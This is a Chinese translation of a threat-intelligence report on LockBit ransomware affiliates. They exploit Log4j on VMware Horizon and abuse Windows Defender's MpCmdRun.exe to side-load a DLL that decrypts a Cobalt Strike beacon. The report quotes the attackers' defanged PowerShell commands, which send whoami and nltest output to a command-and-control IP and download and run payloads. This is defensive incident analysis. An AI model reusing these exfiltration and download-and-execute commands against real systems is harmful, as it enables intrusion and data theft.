依靠Windows Defender|LockBit勒索软件通过Microsoft安全工具侧面加载Cobalt Strike

声明
出品|知道创宇(ID:404实验室）

以下内容，来自知道创宇404实验室翻译组作者原创，由于传播，利用此文所提供的信息而造成的任何直接或间接的后果和损失，均由使用者本人负责，长白山攻防实验室以及文章作者不承担任何责任。

前文

最近，LockBit受到了相当多的关注。上周，SentinelLabs报道了LockBit 3.0（又名LockBit Black），描述了这种日益流行的RaaS的最新迭代如何实现一系列反分析和反调试例程。我们的研究很快被其他报告类似发现的人跟进。

与此同时，早在4月份，SentinelLabs就报告了一家LockBit附属公司如何利用合法的VMware命令行工具VMwareXferlogs.exe来进行侧向加载Cobalt Strike。

在这篇文章中，我们将通过描述LockBit运营商或附属公司使用的另一种合法工具来追踪该事件，只是这次的问题工具属于安全工具：Windows Defender。在最近的调查中，我们发现黑客滥用Windows防御程序的命令行工具MpCmdRun.exe来解密和加载Cobalt Strike的有效载荷。

概述

最初的目标泄露是通过针对未修补的VMWare Horizon服务器的Log4j漏洞发生的。攻击者使用此处记录的PowerShell代码修改了安装web shell的应用程序的Blast Secure Gateway组件。

一旦获得初始访问权限，黑客就执行一系列枚举命令，并试图运行多种开发后工具，包括Meterpreter、PowerShell Empire和一种侧载Cobalt Strike的新方法。

特别是在尝试执行Cobalt Strike时,我们观察到一个新的合法工具用于侧加载恶意DLL,它可以解密负载。

以前观察到的通过删除EDR/EPP的用户地挂钩、Windows事件跟踪和反恶意软件扫描接口来规避防御的技术也被观察到。

攻击链

一旦攻击者通过Log4j漏洞获得初始访问权限，侦察就开始使用PowerShell执行命令，并通过对IP的POST base64编码请求过滤命令输出。侦察活动示例如下：

powershell -c curl -uri http://139.180.184[.]147:80 
met POST -Body ([System.Convert]
::ToBase64String
(([System.Text.Encoding]
::ASCII.GetBytes((whoami)))))
owershell -c curl -uri http://139.180.184[.]147:80 -
met POST -Body
([System.Convert]
::ToBase64String(([System.Text.Encoding]
::ASCII.GetBytes((nltest /domain_trusts)))
))

一旦攻击者获得足够的权限，他们就会尝试下载并执行多个攻击后有效载荷。

攻击者从其控制的C2下载恶意DLL、加密负载和合法工具：

powershell -c Invoke-WebRequest -uri 
http://45.32.108[.]
54:443/mpclient.dll -OutFile 
c:\windows\help\windows\mpclient.dll;
Invoke-WebRequest -uri 
http://45.32.108[.]54:443/c0000015.log -OutFile 
c:\windows\help\windows\c0000015.log;
Invoke-WebRequest -uri 
http://45.32.108[.]54:443/MpCmdRun.exe -OutFile 
c:\windows\help\windows\MpCmdRun.exe;
c:\windows\help\windows\MpCmdRun.exe

值得注意的是，攻击者利用合法的Windows Defender命令行工具MpCmdRun.exe来解密和加载Cobalt Strike有效载荷。

我们还注意到用于下载Cobalt Strike有效载荷的IP地址和用于执行侦察的IP地址之间的相关性：在下载Cobalt Strike后不久，攻击者试图执行并将输出发送到以139开头的IP，如下面两个片段所示。

powershell -c Invoke-WebRequest -uri 
http://45.32.108[.]54:443/glib-2.0.dll -OutFile 
c:\users\public\glib-2.0.dll;
Invoke-WebRequest -uri 
http://45.32.108[.]54:443/c0000013.log -OutFile 
c:\users\public\c0000013.log;
Invoke-WebRequest -uri 
http://45.32.108[.]54:443/VMwareXferlogs.exe -OutFile 
c:\users\public\VMwareXferlogs.exe;
c:\users\public\VMwareXferlogs.exepowershell -c curl -uri 
http://139.180.184[.]147:80 
-met POST -Body ([System.Convert]::
ToBase64String(([System.Text.Encoding]
::ASCII.GetBytes((
c:\users\public\VMwareXferlogs.exe)))
))

与之前报告的 VMwareXferlogs.exe工具的侧加载相同的流程，MpCmd.exe被滥用来侧加载一个武器化的mpclient.dll，它从c0000015.log文件加载并解密Cobalt Strike信标。

因此，在攻击中使用的与使用Windows Defender命令行工具相关的组件有:

总结

防御者需要警惕的是，LockBit勒索软件运营商和附属公司正在探索和利用新颖的离地攻击工具，以帮助他们加载Cobalt Strike信标和规避一些常见的EDR和传统的AV检测工具。

更重要的是，那些安全软件进行例外处理的工具，应接受仔细检查。像VMware和Windows Defender这样的产品在企业中非常普遍，如果被允许在安装的安全控制之外运行，它们对参与者的威胁会很大。

IoC

欢迎关注长白山攻防实验室公众号
定期更新优质文章分享。